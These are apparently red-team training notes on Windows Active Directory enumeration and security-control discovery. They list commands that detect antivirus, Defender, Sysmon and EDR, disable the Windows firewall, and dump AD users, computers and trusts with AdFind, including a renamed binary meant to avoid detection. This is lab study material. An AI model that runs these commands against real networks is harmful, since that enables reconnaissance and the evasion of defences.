Active Directory

Active Directory Objects:
- Users: a security principal that is allowed to authenticate to machines in the domain
- Computers: a special type of user account
- GPOs: collections of policies that are applied to other AD objects

$ systeminfo | findstr Domain ... to check if host is part of a domain

$ Get-ADUser -Filter * ... gets all AD User accounts

$ Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM" ... to restrict the search to a specific container by its Common-Name (CN)

Security Evasion:

$ wmic /namespace:\\root\securitycenter2 path antivirusproduct ... to check installed security products (the SecurityCenter2 namespace exists on workstation editions of Windows, not on Windows Server)

$ Get-Service WinDefend ... to check Defender status

$ Get-MpComputerStatus | select RealTimeProtectionEnabled ... to check Defender real-time scan status

$ Get-NetFirewallProfile | Format-Table Name, Enabled ... to check Windows firewall status

$ Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False ... to disable firewall

$ Get-NetFirewallRule | select DisplayName, Enabled, Description ... to check all firewall settings

$ Test-NetConnection -ComputerName 127.0.0.1 -Port 80 ... to test connections through firewall

$ Get-MpThreat ... to check latest Defender detections

$ Get-EventLog -List ... to list all event log categories, which shows what logging is in place on the host

$ Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" } ... to check if sysmon is running (extended logging)

$ wmic product get name,version ... to enumerate installed software

$ Get-ChildItem -Hidden -Path C:\Users\kkidd\Desktop ... to find hidden files/directories

$ wmic qfe get Caption,Description ... to check installed updates

EDR Enumeration Tools:
- https://github.com/PwnDexter/Invoke-EDRChecker
- https://github.com/PwnDexter/SharpEDRChecker

AD Objects:
- Users
- Services
- Machines (Computername$)
- Security Groups

OU = apply policies
Security Groups = grant permissions

ADFind

Download

Examples

adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "(objectcategory=computer)" > ad_computers.txt
adfind.exe -sc trustdump > ad_trustdump.txt
adfind.exe -subnets -f "(objectCategory=subnet)" > subnets.txt

Usage

aaaa.exe -f "(objectcategory=person)" > C:\tmp\ad_users.txt
aaaa.exe -f "(objectcategory=computer)" > C:\tmp\ad_computers.txt
aaaa.exe -sc trustdump > C:\tmp\ad_trustdump.txt
aaaa.exe -subnets -f "(objectCategory=subnet)" > C:\tmp\ad_subnets.txt

Scripted